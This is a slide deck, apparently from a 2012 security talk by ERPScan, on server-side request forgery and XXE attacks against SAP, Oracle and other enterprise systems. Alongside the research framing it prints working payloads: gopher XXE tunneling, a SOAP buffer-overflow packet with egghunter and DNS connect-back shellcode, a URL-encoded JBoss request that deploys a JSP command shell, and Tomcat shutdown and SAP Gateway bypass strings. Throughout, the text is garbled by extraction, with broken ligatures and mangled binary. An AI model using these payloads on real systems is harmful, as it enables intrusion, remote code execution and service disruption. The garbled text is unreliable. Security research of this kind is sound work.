Upload
erpscan
View
32
Download
3
Embed Size (px)
Citation preview
Invest in security to secure investments
SSRF VS. BUSINESS-‐CRITICAL APPLICATIONS PART 2: NEW VECTORS AND CONNECT-‐BACK ATTACKS
Alexander Polyakov – CTO at ERPScan
About ERPScan
• The only 360-‐degree SAP Security solu8on -‐ ERPScan Security Monitoring Suite for SAP
• Leader by the number of acknowledgements from SAP ( 150+ ) • 60+ presentaQons key security conferences worldwide • 25 Awards and nominaQons • Research team -‐ 20 experts with experience in different areas
of security • Headquarters in Palo Alto (US) and Amsterdam (EU)
2
Agenda
• Enterprise applica8ons • SSRF
– History – Types
• SSRF Proxy aLacks – Example of ALacking SAP with SSRF
• SSRF Connect-‐back aLacks – Examples
• XXE Scanner • Conclusion
3
Enterprise applicaQons: DefiniQons
Business so)ware is generally any so)ware that helps business to increase its efficiency or measure its performance
• Small (MS Office) • Medium (CRM, Shops)
• Enterprise (ERP, BW…)
4
Why are they criQcal?
• Any informa7on an a8acker might want, be it a cybercriminal, industrial spy or compe7tor, is stored in corporate ERP. This informa7on can include financial, customer or public rela7ons, intellectual property, personally iden7fiable informa7on and more. Industrial espionage, sabotage, and fraud or insider embezzlement may be very effec7ve if targeted at the vic7m’s ERP system, and they can cause significant damage to the business.
5
Business-‐criQcal systems architecture
• Located in a secure subnetwork • Secured by firewalls • Monitored by IDS systems
• Regularly patched
6
SSRF History: the beginning
• SSRF: Server Side Request Forgery. • An aLack which was discussed in 2008 with very liLle
informa8on about theory and prac8cal examples. • Like any new term, SSRF doesn’t show us something completely
new like a new type of vulnerability. SSRF-‐style aLacks were known before.
17
SSRF History: Basics
• We send Packet A to Service A • Service A ini8ates Packet B to service B • Services can be on the same host or on different hosts • We can manipulate some fields of packet B within packet A • Various SSRF aLacks depend on how many fields we can
control in packet B
18
Packet A
Packet B
SSRF history
• DeralHeiland – Shmoocon 2008 – Web Portals Gateway To Informa8on Or A Hole In Our Perimeter Defenses
• Spiderlabs 2012 – hLp://blog.spiderlabs.com/2012/05/too-‐xxe-‐for-‐my-‐shirt.html
• Vorontsov 2012 – SSRF via XXE
hLp://2012.caro.org/presenta8ons/aLacks-‐on-‐large-‐modern-‐web-‐applica8ons
• ERPScan (Polyakov,Chastuchin) -‐ SSRF vs business cri8cal applica8ons (Gopher protocol) 2012 august – hLp://erpscan.com/wp-‐content/uploads/2012/08/SSRF-‐vs-‐business-‐
cri8cal-‐applica8ons.-‐XXE-‐Tunelling-‐in-‐SAP.pdf
19
SSRF history
• ssrfsocks by iamultra: a tool for ERPScan’s vulnerability in Gopher – hLps://github.com/iamultra/ssrfsocks 2012 august
• Less Known Web App Vulnerabili8es: Real World Examples. (From ERPScan paper) 2012 October
• ERPScan -‐ Gopher SSRF in JVM advisory October 2012 – hLp://erpscan.com/advisories/dsecrg-‐12-‐039-‐oracle-‐jvm-‐gopher-‐protocol-‐
ssrf/
• ERPScan (Polyakov) -‐ SSRF 2.0 – hLp://erpscan.com/category/publica8ons/
• New research will be published at ZeroNights hLp://2012.zeronights.org/
20
Ideal SSRF
The idea is to find vic7m server interfaces that will allow sending packets ini7ated by the vic7m server to the localhost interface of the vic7m server or to another server secured by a firewall from outside. Ideally, this interface :
• Must allow sending any packet to any host and any port • Must be accessed remotely without authenQcaQon
21
Why?
In this research, we wanted to :
• Collect the informa8on about SSRF aLacks • Categorize them • Show examples of SSRF aLacks • Show new poten8al and real SSRF vectors
22
SSRF
Trusted SSRF Remote SSRF
SSRF proxy aLack SSRF back connect
SSRF counter aLack Local SSRF
Simple
Par8al
Full
23
SSRF proxy a^acks
• Trusted SSRF (Can forge requests to remote services but only to predefined ones)
• Remote SSRF (Can forge requests to any remote IP and port) – Simple Remote SSRF (No control on app level) – ParQal Remote SSRF (Control in some fields of app level) – Full Remote SSRF (Control on app level)
26
ExploiQng SSRF
For every SSRF a8ack, there must be at least 2 vulnerabili7es to successfully trigger the a8ack:
• First vulnerability – Func8onality to create/use links (for trusted SSRF) – Func8onality in some service on Server A which allows us to send remote
packets (for other types of SSRF)
• Second vulnerability – Insecure link (for trusted SSRF) – Vuln. in service on server B (for remote SSRF ) – Vuln. in localhost service on server A (for local SSRF) – Vuln. in client app. on server A (for back-‐connect SSRF)
27
Trusted SSRF
• Trusted SSRF in Oracle – SELECT * FROM myTable@HostB – EXECUTE Schema.Package.Procedure('Parameter')@HostB
• Trusted SSRF in MSSQL – Select * from openquery(HostB,'select * from @@version')]
• Trusted SSRF in SAP NetWeaver – SM59 transac8on
• Also Lotus Domino and others
28
Not so interes8ng…
First vulnerability (funcQonality on Server A)
• Unusual calls • Mul8protocol calls (URI)
– In engines (XML) – In applica8ons
• UNC calls • HTTP calls • FTP calls • LDAP calls • SSH calls • Other calls
29
FuncQonality on server A: Unusual calls
• Remote port scan – SAP NetWeaver wsnavigator (sapnote 1394544,871394) – SAP NetWeaver ipcpricing (sapnote 1545883) – SAP BusinessObjects viewrpt (sapnote 1583610)
• Remote password bruteforce – SAP NetWeaver (NDA)
• Other – Informa8on disclosure by tes8ng if a file or a directory exists – Timing aLacks – Etc????
30
Very applica8on-‐specific. Can be very interes8ng
Example of unusual calls
31
• It is possible to scan internal network from the Internet • Authen8ca8on is not required • SAP NetWeaver J2EE engine is vulnerable /ipcpricing/ui/BufferOverview.jsp? server=172.16.0.13 & port=31337 & dispatcher= & targetClient= & view=
MulQprotocol calls (in XML)
• XML seems to be the new TCP. • Almost all big projects use XML-‐based data transfer. • There are a lot of XML-‐based protocols with different op8ons to
call external resources and thus conduct SSRF aLacks. • There is at least one element type which fits almost all XML-‐
based schemes. The type is: xsd:anyURI. • URIs also encompass URLs of other schemes (e.g., FTP, gopher,
telnet), as well as URNs. • Popular URIs: hLp:// vp:// telnet:// …..
33
MulQprotocol calls in XML
• XML – XML External En8ty – XSD defini8on
• XML Encryp8on • XML Signature • WS-‐Policy • From WS-‐Security • WS-‐Addressing
34
XML EncrypQon
1. <xenc:AgreementMethod Algorithm= "hLp://ServerB/"> 2. <xenc:Encryp8onProperty Target= "hLp://ServerB/"> 3. <xenc:CipherReference URI= "hLp://ServerB/"> 4. <xenc:DataReference URI= "hLp://ServerB/">
36
Successfully Tested
WS-‐Addressing
1. <To xmlns="hLp://www.w3.org/2005/08/addressing"> h^p://ServerB/
</To> 2. <ReplyTo xmlns="hLp://www.w3.org/2005/08/addressing">
<Address>h^p://ServerB/</Address> </ReplyTo>
38
Successfully Tested (0-‐day)
WS-‐Security
1. <input message=“blabla“ wsa:AcQon="hLp://ServerB”/> 2. <output message=“blabla “ wsa:AcQon="hLp://ServerB"/>
40
Not Tested
WS-‐FederaQon
1. <fed:Federa8on Federa8onID="hLp://ServerB/"> 2. <fed:Federa8onInclude>hLp://ServerB/</fed:Federa8onInclude> 3. <fed:TokenIssuerName>hLp://ServerB/</fed:TokenIssuerName> 4. <mex:MetadataReference> <wsa:Address>hLp://ServerB/</wsa:Address> </mex:MetadataReference>
41
Not Tested
XBRL
1. <xbrli:iden8fier scheme="hLp://ServerB/"> 2. <link:roleType roleURI="hLp://ServerB/">
42
Not Tested
ODATA (edmx)
The edmx:Reference element specifies external en7ty models referenced by this EDMX. Referenced models are available in their en7rety to referencing models. All en7ty types, complex types and other named elements in a referenced model can be accessed from a referencing model.
hLp://www.odata.org/media/30002/OData%20CSDL%20Defini8on.html
43
No examples of edmx in the wild (new protocol)
ODATA
1. <edmx:Reference URI=”hLp://ServerB/aLack”> 2. <edmx:Annota8onsReference URI=”hLp://ServerB/aLack”>
44
S8ll no products for tes8ng (0-‐day)
UNC calls: threats
• Sure you can call UNC path if you have a universal URI • But if there is no universal engine you can search for UNC • UNC calls can be used for:
– conduc8ng SMBRelay aLack – reading files from shared folders (open or trusted) – other vectors which will be discussed later.
49
Check SMBRelay bible posts from hLp://erpscan.com/?s=SMBRelay+Bible&x=0&y=0
UNC calls: applicaQons
• SAP NetWeaver – From SAP webservices (sapnote 1503579,1498575) – From RFC func8ons (sapnote 1554030) – From SAP transac8ons, reports (sapnote 1583286)
• Oracle Database – Listener – Database commands such as ctxsys.context
50
And much more
UNC calls: applicaQons
• MsSQL Database • MySQL Database • FTP servers • IBM Lotus Domino controller • VMWare • Anything that uses XML engine
51
And much more
HTTP calls: threats
• Sure you can call HTTP path if you have a universal URI • But if there is no universal engine, you can search for HTTP • HTTP calls can be used for conduc8ng wide range of aLacks on systems which are in one network with Server A - DoS - Inf disclosure - Unauthorized access (like invoker servlets) - Bruteforcing (users/directories/pages) - Fingerprin8ng - etc
52
Examples of HTTP aLacks are beyond the current research
HTTP calls: applicaQons
• SAP NetWeaver – Transac8ons – Reports – RFC commands – Portal portlets – Portal links
• Oracle Database – UTL_HTTP
• MsSQL Database • PostgreSQL Database • Anything that uses XML engine
53
And much more
FTP calls threats
• Sure you can call FTP path if you have a universal URI • FTP is usually possible whenever HTTP is possible • But if there is no universal engine, you can search for FTP • FTP calls can be used to conduct wide range of aLacks on systems which are in one network with Server A - DoS - Inf disclosure - Unauthorized access (like invoker servlets) - Bruteforcing (users/directories/pages) - Fingerprin8ng - etc.
54
Examples of FTP aLacks are beyond the current research
FTP calls: applicaQons
• SAP NetWeaver – Transac8ons – Reports – RFC commands
• Oracle Database – UTL_HTTP
• PostgreSQL Database • Anything that uses XML engine
55
And much more
Other calls
• ldap:// – Bruteforce logins – Informa8on disclosure
• jar:// – Informa8on disclosure
• mailto: • ssh2://
– Bruteforce logins – Rce?
• gopher:// – XXE Tunneling
• …….
56
Just the most popular ones
ExploiQng Gopher (Example)
<?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo>
57
What will happen??
XXE Tunneling (Example)
58
Server B (ERP, HR, BW etc.)
Server A (Portal or XI)
192.168.0.1
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: 192.168.0.1:8000 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://172.16.0.1:3300/AAAAAAAAA" >]> <foo>&date;</foo>
AAAAAAAAAAAAA
Port 3300
telnet 172.16.0.1 3300
XXE Tunneling to Buffer Overflow (Example)
• A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote 1487330)
• Hard to exploit because it requires calling an RFC func8on which calls Kernel func8on
• But even such a complex aLack can be exploited • Get ready for the hardcore
59
XXE Tunneling to Buffer Overflow (Hint 1)
• Shellcode size is limited to 255 bytes (name parameter) • As we don’t have direct connec8on to the Internet from the
vulnerable system, we want to use DNS tunneling shellcode to connect back
• But the XML engine saves some XML data in RWX memory • So we can use egghunter • Any shellcode can be uploaded
60
XXE Tunneling to Buffer Overflow: Packet B
POST /sap/bc/soap/rfc?sap-‐client=000 HTTP/1.1 Authoriza8on: Basic U1FQKjowMjA3NTk3== Host: company.com:80 User-‐Agent: ERPSCAN Pentes8ng tool v 0.2 Content-‐Type: text/xml; charset=u�-‐8 Cookie: sap-‐client=000 Content-‐Length: 2271 <SOAP-‐ENV:Envelope xmlns:SOAP-‐ENV="hLp://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-‐ENC="hLp://schemas.xmlsoap.org/soap/
encoding/" xmlns:xsi="hLp://www.w3.org/2001/XMLSchema-‐instance" xmlns:xsd="hLp://www.w3.org/2001/XMLSchema"><SOAP-‐ENV:Body><m:RSPO_R_SAPGPARAM xmlns:m="urn:sap-‐com:document:sap:rfc:func8ons"><HEAP_EGG>dsecdsechff�4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa</HEAP_EGG><NAME>ºÿÿÎ<fÊÿBRjCXÍ.<Ztï¸dsec‹ú¯uê¯uçÿ琐AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAž¾«DSEC^ü1+ÔSò�:G�ú/9LÿT���â_�@���a}Xs§quڝ�€E�RYëë†Æ�ÿÿéMÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</NAME></m:RSPO_R_SAPGPARAM></SOAP-‐ENV:Body></SOAP-‐ENV:Envelope>
61
XXE Tunneling to Buffer Overflow (Hint 2)
• Next step is to pack this packet B into Packet A • We need to insert non-‐printable symbols • God bless gopher; it supports urlencode like HTTP • It will also help us evade aLack against IDS systems
62
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 Content-‐Length: 7730 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[Urlencoded Packet B]" >]> <foo>&date;</foo>
Packet A
XXE Tunneling to Buffer Overflow (Result)
63
Server B in DMZ (SAP ERP)
Server A on the Internet (SAP XI)
hLp://company.com
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1 Host: sapserver.com:80 <?xml version="1.0" encoding="ISO-‐8859-‐1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY date SYSTEM “gopher://[packetB]" >]> <foo>&date;</foo>
Port 8000 WebRFC service
Packet B
Shellcode service with
DNS payload
Packet C – Command and Control response to a^acker by DNS protocol which is allowed for outband connecQons
So, you can only send one packet by gopher but you can’t control the session… Hmm, actually, some8mes you can.
65
Session handling by SSRF (trick 1)
• Using Gopher, it is possible to send mul8ple packets in one session
Just add them like this – Gopher://[packet1][packet2][packet3]..... – But you must know the session ID or use a protocol without session ID
like telnet
66
Successfully tested for SAP Message Server param. change
Session handling by SSRF (trick 2)
• Just theoreQcal • Let’s suppose that session is handled by the IP and port of client • First packet is sent from some random port, for example, 3000 • Collect info about the session from the response • Construct the second packet (next 8me, the source port will be
3001, 3002… etc.) • Send the second packet un8l the source port will be 3000 again
67
Needs tes8ng
SSRF back connect a^ack
• Local SSRF The idea is to ini8ate connec8on to localhost services in Server A • Counter-‐a^ack The idea of this aLack is to send Packet A to Server A . Service
must take Packet B and send it to the aLacker’s Server C. Server C will make a malformed response to server A and trigger a client-‐side vulnerability in the applica8on.
69
Local SSRF
• The first example is local SSRF • We try to aLack localhost ports on the same server with SSRF • There are a lot of ports listened by OS and applica8ons at
localhost and usually they are less secure
70
Currently working on a database of most interes8ng ports
Local SSRF to Tomcat shutdown
• Tomcat management port 8005 • Open only for localhost • gopher://localhost:8005/SHUTDOWN%0d%0a
72
Successfully exploitable (tnx Alexey Sintsov)
Local SSRF to Oracle Listener
• Problem
– An old vulnerability in Oracle listener in Set_log_file – Secured by LOCAL_OS_AUTHENTICATION in 10G
• ALack – User with CONNECT privileges can run UTL_TCP func8ons – Using UTL_TCP, it is possible to construct any TCP packet and send it to
the listener – Connec8on will be from a local IP, so we will bypass
LOCAL_OS_AUTHENTICATION restric8ons
73
Tested in early 2008
Local SSRF to JBOSS console
• JBOSS management console service • Even with a simple HTTP request • Open only for localhost hLp://localhost:8080/jmx-‐console/HtmlAdaptor?ac8on=invokeOpByName&name=jboss.admin%3Aservice
%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True
74
tnx Alexey Sintsov for sploit
Bypass SAP security restricQons
• It is possible to bypass many SAP Security restric8ons based on ACL – SAP Gateway – SAP Message Server – Other remote services
gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE
75
Gateway example
Counter-‐a^ack SSRF
• This is the most interes8ng way to use SSRF, which was not discussed before .
• We send a command from Server A to our Server C using SSRF, and then we generate a response which will trigger a vulnerability in an applica8on from Server A.
• Some interes8ng aLacks are also possible.
77
New life for client-‐side bugz
Counter-‐a^ack on SMB client
• DoS by reading huge files remotely • SMBRelay • RCE Vulnerabili8es in SMB client
– MS10-‐006 – MS10-‐020 – MS11-‐019 – MS11-‐043
78
Looking for a working example of client-‐side bug
Counter-‐a^ack on FTP client
• Memory corrup8on vulnerabili8es in FTP client. – Some examples
hLps://www.corelan.be/index.php/2010/10/12/death-‐of-‐an-‐vp-‐client/
• Client path traversal – Those types of vulnerabili8es are rare nowadays but there are some
chances to find them in industrial systems because they were created a long 8me ago.
79
Working on real examples
Counter-‐a^ack on HTTP client
The most widespread type of SSRF requests is HTTP. It means that vulnerabili7es in embedded HTTP clients (which are used by different XML engines, for example) are the most sought-‐a)er part of our future research – DoS by mul8ple en88es with links to big data – DoS by mul8ple GZIP bombs
80
Working on real examples
Counter-‐a^ack on JAR parser
XML engines support jar: scheme. Calling some URL using this scheme, JAR parser opens a remote archive and takes a file from it. If there is a file parsing vulnerability in JAR parser, it will be possible to a8ack the server.
• Directory traversal – Tested: JDK jar parser – not vulnerable
• Jar bombs
81
Working on real examples
Counter-‐a^ack on mailto: parser
• mailto:%00%00..\..\..\..\..\..\..\..\\..\\..\\..\\..\\..\
\..//..//..//..//..//../../../../../../windows/system32/aaaa.exe • Successfully read the file • There should be an RCE but….
82
Found yesterday :)
Conclusion 2
• SSRF aLacks are very dangerous • They have a very wide range, which is s8ll poorly covered • Gopher example is not the only one, I suppose • It is s8ll a big research area • A lot of technologies and applica8ons can be used for SSRF • I only check those places where I am working a lot • But there are s8ll many uncovered areas • OWASP-‐EAS SSRF wiki • Let’s make the biggest database of SSRFs • Mail me if you have any ideas
86